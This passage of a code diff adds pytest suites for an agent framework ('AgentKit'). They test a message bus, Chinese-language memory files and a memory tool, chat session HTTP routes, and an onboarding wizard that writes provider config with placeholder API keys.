        """Agent A sends a request, agent B replies, and A gets the response."""
        bus = InMemoryMessageBus()

        async def answer(msg: AgentMessage):
            # Echo the correlation id back with the reply.
            await bus.publish(AgentMessage(
                sender="agent_b",
                recipient=msg.sender,
                topic="reply",
                payload={"answer": 42},
                correlation_id=msg.correlation_id,
            ))

        await bus.subscribe("agent_b", answer)

        question = AgentMessage(
            sender="agent_a",
            recipient="agent_b",
            topic="question",
            payload={"q": "What is the answer?"},
        )
        reply = await bus.request(question, timeout=5.0)
        assert reply.payload["answer"] == 42

    @pytest.mark.asyncio
    async def test_request_timeout(self):
        """A request nobody answers raises TimeoutError."""
        bus = InMemoryMessageBus()
        # No subscriber exists to handle the request.
        question = AgentMessage(
            sender="agent_a",
            recipient="agent_b",
            topic="question",
        )
        with pytest.raises(TimeoutError):
            await bus.request(question, timeout=0.1)

    @pytest.mark.asyncio
    async def test_unsubscribe_stops_delivery(self):
        """No messages arrive after unsubscribing."""
        bus = InMemoryMessageBus()
        inbox, handler = self._collector()
        await bus.subscribe("agent_b", handler)
        await bus.unsubscribe("agent_b")

        await bus.broadcast(AgentMessage(sender="a", topic="test"))
        await asyncio.sleep(0.1)

        assert len(inbox) == 0

    @pytest.mark.asyncio
    async def test_health_check(self):
        """The health check reports True."""
        assert await InMemoryMessageBus().health_check() is True

    @pytest.mark.asyncio
    async def test_backend_type(self):
        """The backend type is reported as ``memory``."""
        assert InMemoryMessageBus().backend_type == "memory"
# ── Factory Tests ─────────────────────────────────────────
class TestCreateMessageBus:
    """Behaviour of the ``create_message_bus`` factory."""

    def test_memory_backend(self):
        """Requesting the memory backend yields an InMemoryMessageBus."""
        bus = create_message_bus(backend="memory")
        assert isinstance(bus, InMemoryMessageBus)

    def test_redis_fallback_to_memory(self):
        """Requesting redis always yields a usable bus object.

        The concrete class depends on whether ``redis.asyncio`` is
        importable, so only the contract shared by every backend is
        checked here.
        """
        bus = create_message_bus(backend="redis")
        # The previous assertion ended in ``or True`` and could never fail.
        # NOTE(review): assumes the factory never returns None and that every
        # backend exposes publish/subscribe - confirm against redis_bus.
        assert bus is not None
        assert callable(getattr(bus, "publish", None))
        assert callable(getattr(bus, "subscribe", None))

View File

@ -0,0 +1,102 @@
"""Tests for Chat memory integration — 记忆注入 + MemoryTool + 日志生成 (U4)."""
from pathlib import Path
from unittest.mock import AsyncMock, MagicMock, patch
import pytest
from agentkit.memory.profile import MemoryStore, MemorySnapshot
from agentkit.tools.memory_tool import MemoryTool
class TestChatMemoryInjection:
    """Memory content injected into the system prompt when a chat starts."""

    def test_memory_store_initializes_with_base_dir(self, tmp_path: Path):
        """With default files present, identity and base prompt both appear."""
        memory = MemoryStore(base_dir=tmp_path)
        memory.ensure_defaults()
        rendered = memory.build_system_prompt(memory.load_all(), "Be helpful.")
        for expected in ("<agent-identity>", "AgentKit", "Be helpful."):
            assert expected in rendered

    def test_no_memory_files_returns_base_prompt(self, tmp_path: Path):
        """Without any memory files the base prompt is returned unchanged."""
        memory = MemoryStore(base_dir=tmp_path)
        rendered = memory.build_system_prompt(memory.load_all(), "Be helpful.")
        assert rendered == "Be helpful."

    def test_default_soul_injected(self, tmp_path: Path):
        """The default identity is injected even without a base prompt."""
        memory = MemoryStore(base_dir=tmp_path)
        memory.ensure_defaults()
        rendered = memory.build_system_prompt(memory.load_all())
        assert "<agent-identity>" in rendered
        assert "专业" in rendered or "AgentKit" in rendered
class TestChatMemoryToolAvailable:
    """MemoryTool is usable from within a conversation."""

    # The asyncio marker is set explicitly, as on the other async tests in
    # this change, so these coroutines run when pytest-asyncio is in strict
    # mode instead of being left unawaited.
    @pytest.mark.asyncio
    async def test_memory_tool_in_tools_list(self, tmp_path: Path):
        """The tool is named ``memory`` and exposes an input schema."""
        store = MemoryStore(base_dir=tmp_path)
        tool = MemoryTool(memory_store=store)
        assert tool.name == "memory"
        assert tool.input_schema is not None

    @pytest.mark.asyncio
    async def test_memory_tool_add_and_read(self, tmp_path: Path):
        """Content added through the tool can be read back through it."""
        store = MemoryStore(base_dir=tmp_path)
        tool = MemoryTool(memory_store=store)

        # Add
        result = await tool.execute(action="add", file="user", section="称呼", content="叫我老板")
        assert result["success"] is True

        # Read
        result = await tool.execute(action="read", file="user")
        assert "老板" in result["content"]
class TestChatMemoryPersistence:
    """Memory files persist across ``/clear`` and across store instances."""

    def test_memory_survives_session_clear(self, tmp_path: Path):
        """``/clear`` drops session history only; memory files remain."""
        MemoryStore(base_dir=tmp_path).get_file("user").write("## 称呼\n叫我老板")

        # Simulate /clear by building a brand-new store on the same directory.
        reopened = MemoryStore(base_dir=tmp_path)
        assert "老板" in reopened.get_file("user").read()

    def test_memory_persists_across_store_instances(self, tmp_path: Path):
        """Content written by one store is visible to another on the same dir."""
        writer = MemoryStore(base_dir=tmp_path)
        writer.get_file("memory").write("## 项目\nAgentKit框架")

        reader = MemoryStore(base_dir=tmp_path)
        assert "AgentKit" in reader.get_file("memory").read()
class TestChatDailyLogGeneration:
    """Daily log file handling at the end of a conversation."""

    def test_daily_file_path_is_today(self, tmp_path: Path):
        """The daily file's path contains today's UTC date."""
        from datetime import datetime, timezone

        daily_file = MemoryStore(base_dir=tmp_path).get_file("daily")
        stamp = datetime.now(timezone.utc).strftime("%Y-%m-%d")
        assert stamp in str(daily_file.path)

    def test_write_daily_log(self, tmp_path: Path):
        """Text written to the daily file can be read back."""
        daily_file = MemoryStore(base_dir=tmp_path).get_file("daily")
        daily_file.write("讨论了AgentKit记忆系统架构")
        assert "记忆系统" in daily_file.read()

    def test_daily_log_loads_in_snapshot(self, tmp_path: Path):
        """The daily log content shows up in the loaded snapshot."""
        memory = MemoryStore(base_dir=tmp_path)
        memory.get_file("daily").write("今天完成了记忆系统开发")
        assert "记忆系统" in memory.load_all().daily

View File

@ -0,0 +1,98 @@
"""Tests for Chat API routes."""
import pytest
from unittest.mock import AsyncMock, MagicMock, patch
from fastapi.testclient import TestClient
from agentkit.session.manager import SessionManager
from agentkit.session.store import InMemorySessionStore
from agentkit.session.models import SessionStatus
@pytest.fixture
def app_with_chat():
    """Build a FastAPI app exposing the chat router with stubbed app state.

    The session manager is real (in-memory store); the LLM gateway, agent
    pool and server config are mocks, and the configured API key is None.
    """
    from fastapi import FastAPI
    from agentkit.server.routes.chat import router

    application = FastAPI()
    application.include_router(router, prefix="/api/v1")

    state = application.state
    state.session_manager = SessionManager(store=InMemorySessionStore())
    state.llm_gateway = MagicMock()
    state.agent_pool = MagicMock()
    state.server_config = MagicMock()
    state.server_config.api_key = None
    return application
@pytest.fixture
def client(app_with_chat):
    """Return a TestClient bound to the chat-enabled application."""
    test_client = TestClient(app_with_chat)
    return test_client
class TestChatSessionCRUD:
    """HTTP-level create / read / close / message operations on sessions."""

    SESSIONS = "/api/v1/chat/sessions"

    def _open_session(self, client) -> str:
        """Create a session for ``test-agent`` and return its id."""
        created = client.post(self.SESSIONS, json={"agent_name": "test-agent"})
        return created.json()["session_id"]

    def test_create_session(self, client):
        """Creating a session returns an active session with an id."""
        resp = client.post(self.SESSIONS, json={"agent_name": "test-agent"})
        assert resp.status_code == 200
        body = resp.json()
        assert body["agent_name"] == "test-agent"
        assert body["status"] == "active"
        assert "session_id" in body

    def test_get_session(self, client):
        """A created session can be fetched by id."""
        sid = self._open_session(client)
        fetched = client.get(f"{self.SESSIONS}/{sid}")
        assert fetched.status_code == 200
        assert fetched.json()["session_id"] == sid

    def test_get_nonexistent_session(self, client):
        """Fetching an unknown session id gives 404."""
        assert client.get(f"{self.SESSIONS}/nonexistent").status_code == 404

    def test_close_session(self, client):
        """Deleting a session reports it as closed."""
        sid = self._open_session(client)
        closed = client.delete(f"{self.SESSIONS}/{sid}")
        assert closed.status_code == 200
        assert closed.json()["status"] == "closed"

    def test_close_nonexistent_session(self, client):
        """Deleting an unknown session id gives 404."""
        assert client.delete(f"{self.SESSIONS}/nonexistent").status_code == 404

    def test_get_messages_empty(self, client):
        """A fresh session has an empty message list."""
        sid = self._open_session(client)
        listing = client.get(f"{self.SESSIONS}/{sid}/messages")
        assert listing.status_code == 200
        assert listing.json() == []

    def test_get_messages_nonexistent_session(self, client):
        """Listing messages of an unknown session gives 404."""
        assert client.get(f"{self.SESSIONS}/nonexistent/messages").status_code == 404

    def test_send_message_closed_session(self, client):
        """Posting a message to a closed session gives 400."""
        sid = self._open_session(client)
        client.delete(f"{self.SESSIONS}/{sid}")
        posted = client.post(
            f"{self.SESSIONS}/{sid}/messages",
            json={"content": "Hello"},
        )
        assert posted.status_code == 400

    def test_send_message_nonexistent_session(self, client):
        """Posting a message to an unknown session gives 404."""
        posted = client.post(
            f"{self.SESSIONS}/nonexistent/messages",
            json={"content": "Hello"},
        )
        assert posted.status_code == 404

View File

@ -0,0 +1,249 @@
"""Tests for MemoryFile + MemoryStore — 记忆文件读写与多文件管理 (U1+U2)."""
import tempfile
from datetime import datetime, timedelta, timezone
from pathlib import Path
import pytest
from agentkit.memory.profile import MemoryFile, MemoryStore, MemorySnapshot
class TestMemoryFileBasicIO:
    """Basic read/write behaviour of ``MemoryFile``."""

    def test_read_nonexistent_file_returns_empty(self, tmp_path: Path):
        """Reading a path that was never written yields an empty string."""
        missing = MemoryFile(tmp_path / "no_such.md")
        assert missing.read() == ""

    def test_write_and_read_back(self, tmp_path: Path):
        """Written text is returned unchanged by ``read``."""
        memory_file = MemoryFile(tmp_path / "test.md")
        memory_file.write("hello world")
        assert memory_file.read() == "hello world"

    def test_write_creates_parent_dirs(self, tmp_path: Path):
        """Writing to a path with missing parent directories still succeeds."""
        nested_path = tmp_path / "deep" / "nested" / "test.md"
        memory_file = MemoryFile(nested_path)
        memory_file.write("content")
        assert memory_file.read() == "content"

    def test_overwrite_existing(self, tmp_path: Path):
        """A second ``write`` replaces the earlier content."""
        memory_file = MemoryFile(tmp_path / "test.md")
        for text in ("first", "second"):
            memory_file.write(text)
        assert memory_file.read() == "second"
class TestMemoryFileSections:
    """Section-level operations of ``MemoryFile`` on ``## heading`` blocks."""

    # Fixture texts shared by the tests below.
    ONE_SECTION = "## 身份\n我是小王"
    TWO_SECTIONS = "## 身份\n我是小王\n## 性格\n友好耐心"

    def _make_file(self, tmp_path: Path, content: str) -> MemoryFile:
        """Create ``test.md`` under ``tmp_path`` pre-filled with ``content``."""
        prepared = MemoryFile(tmp_path / "test.md")
        prepared.write(content)
        return prepared

    def test_read_section_from_empty_file(self, tmp_path: Path):
        """Reading a section from a never-written file yields ``""``."""
        blank = MemoryFile(tmp_path / "empty.md")
        assert blank.read_section("身份") == ""

    def test_read_section_returns_content(self, tmp_path: Path):
        """``read_section`` returns only the body of the named section."""
        doc = self._make_file(tmp_path, self.TWO_SECTIONS)
        assert doc.read_section("身份") == "我是小王"

    def test_read_section_not_found_returns_empty(self, tmp_path: Path):
        """An unknown section name yields ``""``."""
        doc = self._make_file(tmp_path, self.ONE_SECTION)
        assert doc.read_section("不存在") == ""

    def test_add_section_creates_new(self, tmp_path: Path):
        """Adding an unknown section creates it and leaves others intact."""
        doc = self._make_file(tmp_path, self.ONE_SECTION)
        doc.add_section("性格", "友好耐心")
        assert doc.read_section("性格") == "友好耐心"
        assert doc.read_section("身份") == "我是小王"

    def test_add_section_appends_to_existing(self, tmp_path: Path):
        """Adding to an existing section keeps the old text and adds the new."""
        doc = self._make_file(tmp_path, self.ONE_SECTION)
        doc.add_section("身份", "也是AI助手")
        identity = doc.read_section("身份")
        assert "我是小王" in identity
        assert "也是AI助手" in identity

    def test_replace_section_text(self, tmp_path: Path):
        """``replace_section`` swaps text inside one section only."""
        doc = self._make_file(tmp_path, self.TWO_SECTIONS)
        doc.replace_section("身份", "我是小王", "我是大王")
        assert doc.read_section("身份") == "我是大王"
        assert doc.read_section("性格") == "友好耐心"

    def test_replace_section_old_not_found_returns_false(self, tmp_path: Path):
        """``replace_section`` returns ``False`` when the old text is absent."""
        doc = self._make_file(tmp_path, self.ONE_SECTION)
        outcome = doc.replace_section("身份", "不存在", "新内容")
        assert outcome is False

    def test_remove_section(self, tmp_path: Path):
        """Removing a section empties it and keeps the other section."""
        doc = self._make_file(tmp_path, self.TWO_SECTIONS)
        doc.remove_section("身份")
        assert doc.read_section("身份") == ""
        assert doc.read_section("性格") == "友好耐心"

    def test_remove_nonexistent_section_no_error(self, tmp_path: Path):
        """Removing an unknown section must not raise and changes nothing."""
        doc = self._make_file(tmp_path, self.ONE_SECTION)
        doc.remove_section("不存在")  # must not raise
        assert doc.read_section("身份") == "我是小王"

    def test_list_sections(self, tmp_path: Path):
        """``list_sections`` returns the section names in file order."""
        doc = self._make_file(tmp_path, self.TWO_SECTIONS)
        names = doc.list_sections()
        assert names == ["身份", "性格"]
class TestMemoryFileCapacity:
    """Character-budget handling of ``MemoryFile``."""

    def test_trim_to_budget_keeps_content_within_limit(self, tmp_path: Path):
        """After ``trim_to_budget`` the stored text fits the budget."""
        budget = 20
        capped = MemoryFile(tmp_path / "test.md", char_budget=budget)
        capped.write("## 身份\n我是小王一个专业的AI助手")  # longer than 20 characters
        capped.trim_to_budget()
        assert len(capped.read()) <= budget

    def test_trim_preserves_earlier_sections(self, tmp_path: Path):
        """Trimming keeps the leading section when a later one overflows."""
        capped = MemoryFile(tmp_path / "test.md", char_budget=30)
        # The second section pushes the file over budget.
        capped.write("## 身份\n我是小王\n## 性格\n友好耐心注重细节")
        capped.trim_to_budget()
        remaining = capped.read()
        assert "身份" in remaining  # the earlier section survives

    def test_no_trim_when_within_budget(self, tmp_path: Path):
        """Content below the budget is left byte-for-byte unchanged."""
        text = "## 身份\n我是小王"
        roomy = MemoryFile(tmp_path / "test.md", char_budget=1000)
        roomy.write(text)
        roomy.trim_to_budget()
        assert roomy.read() == text

    def test_write_auto_trims(self, tmp_path: Path):
        """``write`` alone already enforces the budget."""
        budget = 15
        capped = MemoryFile(tmp_path / "test.md", char_budget=budget)
        capped.write("## 身份\n我是小王一个专业的AI助手非常长")
        assert len(capped.read()) <= budget
class TestMemoryStoreInit:
    """Directory layout created by constructing a ``MemoryStore``.

    Each test only cares about the constructor's filesystem side effects, so
    the instance is deliberately not bound to a name.
    """

    def test_init_creates_base_dir(self, tmp_path: Path):
        """A missing ``base_dir`` is created by the constructor."""
        base_dir = tmp_path / "new_dir"
        MemoryStore(base_dir=base_dir)
        assert base_dir.exists()

    def test_init_creates_memories_subdir(self, tmp_path: Path):
        """The constructor creates ``<base_dir>/memories``."""
        MemoryStore(base_dir=tmp_path)
        assert (tmp_path / "memories").exists()

    def test_init_creates_daily_subdir(self, tmp_path: Path):
        """The constructor creates ``<base_dir>/memories/daily``."""
        MemoryStore(base_dir=tmp_path)
        assert (tmp_path / "memories" / "daily").exists()
class TestMemoryStoreLoadAll:
    """Behaviour of ``MemoryStore.load_all``."""

    def test_load_all_returns_snapshot(self, tmp_path: Path):
        """``load_all`` returns a ``MemorySnapshot`` instance."""
        loaded = MemoryStore(base_dir=tmp_path).load_all()
        assert isinstance(loaded, MemorySnapshot)

    def test_load_all_empty_when_no_files(self, tmp_path: Path):
        """With nothing written, the snapshot reports itself as empty."""
        loaded = MemoryStore(base_dir=tmp_path).load_all()
        assert loaded.is_empty()

    def test_load_all_with_content(self, tmp_path: Path):
        """Written ``soul`` and ``user`` files surface in the snapshot."""
        memory_store = MemoryStore(base_dir=tmp_path)
        memory_store.get_file("soul").write("## 身份\n我是小王")
        memory_store.get_file("user").write("## 称呼\n叫我老板")
        loaded = memory_store.load_all()
        assert "小王" in loaded.soul
        assert "老板" in loaded.user
        assert loaded.total_chars > 0
class TestMemoryStoreBuildPrompt:
    """Behaviour of ``MemoryStore.build_system_prompt``."""

    def test_build_prompt_injects_all_sections(self, tmp_path: Path):
        """Soul and user memory are wrapped in tags next to the base prompt."""
        memory_store = MemoryStore(base_dir=tmp_path)
        memory_store.get_file("soul").write("## 身份\n我是小王")
        memory_store.get_file("user").write("## 称呼\n叫我老板")
        rendered = memory_store.build_system_prompt(
            memory_store.load_all(), "Be helpful."
        )
        assert "<agent-identity>" in rendered
        assert "小王" in rendered
        assert "<user-profile>" in rendered
        assert "老板" in rendered
        assert "Be helpful." in rendered

    def test_build_prompt_no_memory_returns_base_only(self, tmp_path: Path):
        """With an empty snapshot the base prompt is returned verbatim."""
        memory_store = MemoryStore(base_dir=tmp_path)
        empty_snapshot = memory_store.load_all()
        rendered = memory_store.build_system_prompt(empty_snapshot, "Be helpful.")
        assert rendered == "Be helpful."

    def test_build_prompt_empty_base_with_memory(self, tmp_path: Path):
        """Memory is still injected when no base prompt is passed."""
        memory_store = MemoryStore(base_dir=tmp_path)
        memory_store.get_file("soul").write("## 身份\n我是小王")
        rendered = memory_store.build_system_prompt(memory_store.load_all())
        assert "<agent-identity>" in rendered
        assert "小王" in rendered
class TestMemoryStoreDefaults:
    """Behaviour of ``MemoryStore.ensure_defaults``."""

    def test_ensure_defaults_creates_soul(self, tmp_path: Path):
        """On a fresh store the default soul text mentions ``AgentKit``."""
        memory_store = MemoryStore(base_dir=tmp_path)
        memory_store.ensure_defaults()
        soul_text = memory_store.get_file("soul").read()
        assert "AgentKit" in soul_text

    def test_ensure_defaults_no_overwrite(self, tmp_path: Path):
        """Existing soul content is kept and not replaced by the default."""
        memory_store = MemoryStore(base_dir=tmp_path)
        memory_store.get_file("soul").write("## 身份\n自定义内容")
        memory_store.ensure_defaults()
        soul_text = memory_store.get_file("soul").read()
        assert "自定义内容" in soul_text
        assert "AgentKit" not in soul_text
class TestMemoryStoreDailyLogs:
    """Daily-log loading, archiving and file-key validation on ``MemoryStore``."""

    def test_load_daily_logs_empty(self, tmp_path: Path):
        """Without any daily files the combined log text is empty."""
        memory_store = MemoryStore(base_dir=tmp_path)
        logs = memory_store.load_daily_logs()
        assert logs == ""

    def test_load_daily_logs_with_today(self, tmp_path: Path):
        """A file named after today's UTC date is included in the logs."""
        memory_store = MemoryStore(base_dir=tmp_path)
        date_stamp = datetime.now(timezone.utc).strftime("%Y-%m-%d")
        todays_path = tmp_path / "memories" / "daily" / f"{date_stamp}.md"
        MemoryFile(todays_path).write("讨论了项目架构")
        assert "讨论了项目架构" in memory_store.load_daily_logs()

    def test_archive_old_dailies(self, tmp_path: Path):
        """A five-day-old log is archived away when ``keep_days=2``."""
        memory_store = MemoryStore(base_dir=tmp_path)
        # Create a stale daily log dated five days ago (UTC).
        five_days_ago = datetime.now(timezone.utc) - timedelta(days=5)
        stale_name = five_days_ago.strftime("%Y-%m-%d")
        stale_log = tmp_path / "memories" / "daily" / f"{stale_name}.md"
        stale_log.parent.mkdir(parents=True, exist_ok=True)
        stale_log.write_text("旧日志", encoding="utf-8")
        archived = memory_store.archive_old_dailies(keep_days=2)
        assert archived == 1
        assert not stale_log.exists()

    def test_get_file_daily_returns_today(self, tmp_path: Path):
        """The ``daily`` key resolves to a path containing today's UTC date."""
        memory_store = MemoryStore(base_dir=tmp_path)
        daily_file = memory_store.get_file("daily")
        date_stamp = datetime.now(timezone.utc).strftime("%Y-%m-%d")
        assert date_stamp in str(daily_file.path)

    def test_get_file_invalid_key_raises(self, tmp_path: Path):
        """An unknown file key raises ``ValueError`` mentioning the key error."""
        memory_store = MemoryStore(base_dir=tmp_path)
        with pytest.raises(ValueError, match="Invalid file_key"):
            memory_store.get_file("invalid")

View File

@ -0,0 +1,112 @@
"""Tests for MemoryTool — Agent 可调用的记忆操作工具 (U3)."""
from pathlib import Path
import pytest
from agentkit.memory.profile import MemoryStore
from agentkit.tools.memory_tool import MemoryTool
@pytest.fixture
def store(tmp_path: Path) -> MemoryStore:
    """Provide a ``MemoryStore`` rooted at the per-test temporary directory."""
    memory_store = MemoryStore(base_dir=tmp_path)
    return memory_store
@pytest.fixture
def tool(store: MemoryStore) -> MemoryTool:
    """Provide a ``MemoryTool`` bound to the ``store`` fixture."""
    memory_tool = MemoryTool(memory_store=store)
    return memory_tool
# The explicit marker makes these coroutine tests run under pytest-asyncio's
# strict mode as well; it is a no-op when asyncio_mode=auto is configured.
@pytest.mark.asyncio
class TestMemoryToolAdd:
    """``action="add"`` of ``MemoryTool.execute``."""

    async def test_add_creates_new_section(self, tool: MemoryTool, store: MemoryStore):
        """Adding to an unknown section creates it with the given content."""
        result = await tool.execute(
            action="add", file="memory", section="项目信息", content="使用Python和FastAPI"
        )
        assert result["success"] is True
        content = store.get_file("memory").read_section("项目信息")
        assert "Python和FastAPI" in content

    async def test_add_appends_to_existing_section(self, tool: MemoryTool, store: MemoryStore):
        """Adding to an existing section keeps the old text and adds the new."""
        store.get_file("memory").write("## 项目信息\n使用Python")
        result = await tool.execute(
            action="add", file="memory", section="项目信息", content="还有TypeScript"
        )
        assert result["success"] is True
        content = store.get_file("memory").read_section("项目信息")
        assert "Python" in content
        assert "TypeScript" in content

    async def test_add_to_soul(self, tool: MemoryTool, store: MemoryStore):
        """The ``soul`` file accepts additions too."""
        result = await tool.execute(
            action="add", file="soul", section="爱好", content="编程和阅读"
        )
        assert result["success"] is True
        assert "编程和阅读" in store.get_file("soul").read_section("爱好")
# The explicit marker makes these coroutine tests run under pytest-asyncio's
# strict mode as well; it is a no-op when asyncio_mode=auto is configured.
@pytest.mark.asyncio
class TestMemoryToolReplace:
    """``action="replace"`` of ``MemoryTool.execute``."""

    async def test_replace_text_in_section(self, tool: MemoryTool, store: MemoryStore):
        """Replacing text changes the target section and leaves others alone."""
        store.get_file("memory").write("## 项目信息\n使用Python\n## 团队\n3人")
        result = await tool.execute(
            action="replace", file="memory", section="项目信息",
            old_text="Python", new_text="Rust",
        )
        assert result["success"] is True
        assert "Rust" in store.get_file("memory").read_section("项目信息")
        assert "3人" in store.get_file("memory").read_section("团队")

    async def test_replace_old_not_found_fails(self, tool: MemoryTool, store: MemoryStore):
        """A missing ``old_text`` yields ``success=False`` with a 'not found' error."""
        store.get_file("memory").write("## 项目信息\n使用Python")
        result = await tool.execute(
            action="replace", file="memory", section="项目信息",
            old_text="不存在", new_text="新内容",
        )
        assert result["success"] is False
        assert "not found" in result.get("error", "").lower()
# The explicit marker makes this coroutine test run under pytest-asyncio's
# strict mode as well; it is a no-op when asyncio_mode=auto is configured.
@pytest.mark.asyncio
class TestMemoryToolRemove:
    """``action="remove"`` of ``MemoryTool.execute``."""

    async def test_remove_section(self, tool: MemoryTool, store: MemoryStore):
        """Removing a section empties it and keeps the sibling section."""
        store.get_file("memory").write("## 项目信息\n使用Python\n## 团队\n3人")
        result = await tool.execute(action="remove", file="memory", section="项目信息")
        assert result["success"] is True
        assert store.get_file("memory").read_section("项目信息") == ""
        assert "3人" in store.get_file("memory").read_section("团队")
# The explicit marker makes these coroutine tests run under pytest-asyncio's
# strict mode as well; it is a no-op when asyncio_mode=auto is configured.
@pytest.mark.asyncio
class TestMemoryToolRead:
    """``action="read"`` of ``MemoryTool.execute``."""

    async def test_read_file_content(self, tool: MemoryTool, store: MemoryStore):
        """Reading returns the file's text under the ``content`` key."""
        store.get_file("memory").write("## 项目信息\n使用Python")
        result = await tool.execute(action="read", file="memory")
        assert result["success"] is True
        assert "Python" in result["content"]

    async def test_read_empty_file(self, tool: MemoryTool, store: MemoryStore):
        """Reading a never-written file succeeds with empty content."""
        result = await tool.execute(action="read", file="memory")
        assert result["success"] is True
        assert result["content"] == ""
# The explicit marker makes these coroutine tests run under pytest-asyncio's
# strict mode as well; it is a no-op when asyncio_mode=auto is configured.
@pytest.mark.asyncio
class TestMemoryToolValidation:
    """Argument validation and capacity handling of ``MemoryTool.execute``."""

    async def test_invalid_file_key(self, tool: MemoryTool):
        """An unknown ``file`` key fails with an error containing 'Invalid'."""
        result = await tool.execute(action="read", file="invalid")
        assert result["success"] is False
        assert "Invalid" in result.get("error", "")

    async def test_invalid_action(self, tool: MemoryTool):
        """An unknown ``action`` fails with an 'Unknown action' error."""
        result = await tool.execute(action="delete_everything", file="memory")
        assert result["success"] is False
        assert "Unknown action" in result.get("error", "")

    async def test_add_respects_capacity(self, tool: MemoryTool, store: MemoryStore):
        """Oversized additions succeed but the stored file stays within budget."""
        # NOTE(review): 2200 is assumed to be the memory file's character
        # budget (MEMORY_BUDGET) — confirm against agentkit.memory.profile.
        long_content = "A" * 3000
        result = await tool.execute(
            action="add", file="memory", section="测试", content=long_content
        )
        assert result["success"] is True
        content = store.get_file("memory").read()
        assert len(content) <= 2200

View File

@ -0,0 +1,216 @@
"""Tests for onboarding wizard and chat command."""
from pathlib import Path
from unittest.mock import patch
import yaml
from agentkit.cli.onboarding import (
PROVIDER_PRESETS,
needs_onboarding,
run_onboarding,
)
class TestNeedsOnboarding:
    """Config-detection checks for ``needs_onboarding``."""

    def test_needs_onboarding_when_no_config(self, tmp_path, monkeypatch):
        """Should return True when no config file exists."""
        # Point HOME at an empty directory so a real ~/.agentkit/agentkit.yaml
        # on the machine running the tests cannot satisfy the lookup.
        home_dir = tmp_path / "home"
        home_dir.mkdir()
        empty_dir = tmp_path / "empty"
        empty_dir.mkdir()
        monkeypatch.setenv("HOME", str(home_dir))
        monkeypatch.chdir(empty_dir)
        monkeypatch.delenv("AGENTKIT_CONFIG_PATH", raising=False)
        assert needs_onboarding() is True

    def test_no_onboarding_when_config_exists(self, tmp_path, monkeypatch):
        """Should return False when agentkit.yaml exists."""
        config_file = tmp_path / "agentkit.yaml"
        config_file.write_text("server:\n port: 8001\n", encoding="utf-8")
        monkeypatch.chdir(tmp_path)
        assert needs_onboarding(config_arg=str(config_file)) is False

    def test_no_onboarding_with_home_config(self, tmp_path, monkeypatch):
        """Should return False when ~/.agentkit/agentkit.yaml exists."""
        home_dir = tmp_path / "home"
        agentkit_dir = home_dir / ".agentkit"
        agentkit_dir.mkdir(parents=True)
        (agentkit_dir / "agentkit.yaml").write_text(
            "server:\n port: 8001\n", encoding="utf-8"
        )
        monkeypatch.setenv("HOME", str(home_dir))
        # Clear the override so the home-directory lookup is what gets tested.
        monkeypatch.delenv("AGENTKIT_CONFIG_PATH", raising=False)
        # Run from an empty cwd to ensure there is no local config.
        empty_dir = tmp_path / "empty"
        empty_dir.mkdir()
        monkeypatch.chdir(empty_dir)
        assert needs_onboarding() is False
class TestProviderPresets:
    """Shape checks for the ``PROVIDER_PRESETS`` table."""

    def test_all_presets_have_required_fields(self):
        """Every preset carries name, env_key, base_url, models and default_model."""
        for provider, spec in PROVIDER_PRESETS.items():
            for field in ("name", "env_key", "base_url", "models"):
                assert field in spec, f"{provider} missing {field}"
            assert spec["models"], f"{provider} has empty models"
            assert "default_model" in spec, f"{provider} missing default_model"

    def test_preset_keys_are_lowercase(self):
        """Provider keys should be lowercase."""
        for key in PROVIDER_PRESETS:
            lowered = key.lower()
            assert key == lowered, f"Provider key '{key}' should be lowercase"

    def test_deepseek_preset(self):
        """The DeepSeek preset uses its own API key variable and the openai type."""
        deepseek = PROVIDER_PRESETS["deepseek"]
        assert deepseek["env_key"] == "DEEPSEEK_API_KEY"
        assert "deepseek-chat" in deepseek["models"]
        assert deepseek["type"] == "openai"

    def test_qwen_preset(self):
        """The Qwen preset points at a DashScope URL and key variable."""
        preset = PROVIDER_PRESETS["qwen"]
        assert "dashscope" in preset["base_url"]
        assert preset["env_key"] == "DASHSCOPE_API_KEY"
class TestRunOnboarding:
    """``run_onboarding`` driven by mocked ``Prompt`` / ``Confirm`` answers.

    Every test redirects HOME into ``tmp_path`` so nothing is written to the
    real home directory, and reads generated files with an explicit UTF-8
    encoding so results do not depend on the platform locale.
    """

    def test_onboarding_generates_config_files(self, tmp_path, monkeypatch):
        """Onboarding should generate agentkit.yaml and .env."""
        monkeypatch.chdir(tmp_path)
        monkeypatch.setenv("HOME", str(tmp_path / "home"))
        (tmp_path / "home").mkdir(exist_ok=True)
        # Mock user input
        with patch("agentkit.cli.onboarding.Prompt") as mock_prompt, \
                patch("agentkit.cli.onboarding.Confirm") as mock_confirm:
            # Step 1: Select DeepSeek (option 1)
            # Step 2: API key
            # Step 2b: Select model (1 = deepseek-chat, default)
            # Step 5: Agent personality (name, personality, speaking_style)
            mock_prompt.ask.side_effect = ["1", "sk-test-deepseek-key", "1", "小王", "友好耐心", "简洁专业"]
            # Step 3: No second provider
            mock_confirm.ask.return_value = False
            config_path = run_onboarding(output_dir=str(tmp_path))
        assert config_path is not None
        assert Path(config_path).exists()
        # Verify agentkit.yaml content
        with open(config_path, encoding="utf-8") as f:
            config = yaml.safe_load(f)
        assert "llm" in config
        assert "deepseek" in config["llm"]["providers"]
        assert config["llm"]["providers"]["deepseek"]["base_url"] == "https://api.deepseek.com/v1"
        # Verify .env content
        env_path = tmp_path / ".env"
        assert env_path.exists()
        env_content = env_path.read_text(encoding="utf-8")
        assert "DEEPSEEK_API_KEY=sk-test-deepseek-key" in env_content

    def test_onboarding_with_two_providers(self, tmp_path, monkeypatch):
        """Onboarding should support adding a second provider."""
        monkeypatch.chdir(tmp_path)
        monkeypatch.setenv("HOME", str(tmp_path / "home"))
        (tmp_path / "home").mkdir(exist_ok=True)
        with patch("agentkit.cli.onboarding.Prompt") as mock_prompt, \
                patch("agentkit.cli.onboarding.Confirm") as mock_confirm:
            # Select DeepSeek (1), API key, model (1), then Qwen as second
            # After removing deepseek, remaining = [openai, bailian-coding, qwen, doubao, gemini, anthropic]
            # qwen is at index 2, so option 3
            # Step 5: Agent personality defaults
            mock_prompt.ask.side_effect = ["1", "sk-deepseek", "1", "3", "sk-dashscope", "1", "AgentKit", "专业、友好、注重细节", "简洁清晰"]
            mock_confirm.ask.return_value = True
            config_path = run_onboarding(output_dir=str(tmp_path))
        with open(config_path, encoding="utf-8") as f:
            config = yaml.safe_load(f)
        providers = config["llm"]["providers"]
        assert "deepseek" in providers
        assert "qwen" in providers
        env_path = tmp_path / ".env"
        env_content = env_path.read_text(encoding="utf-8")
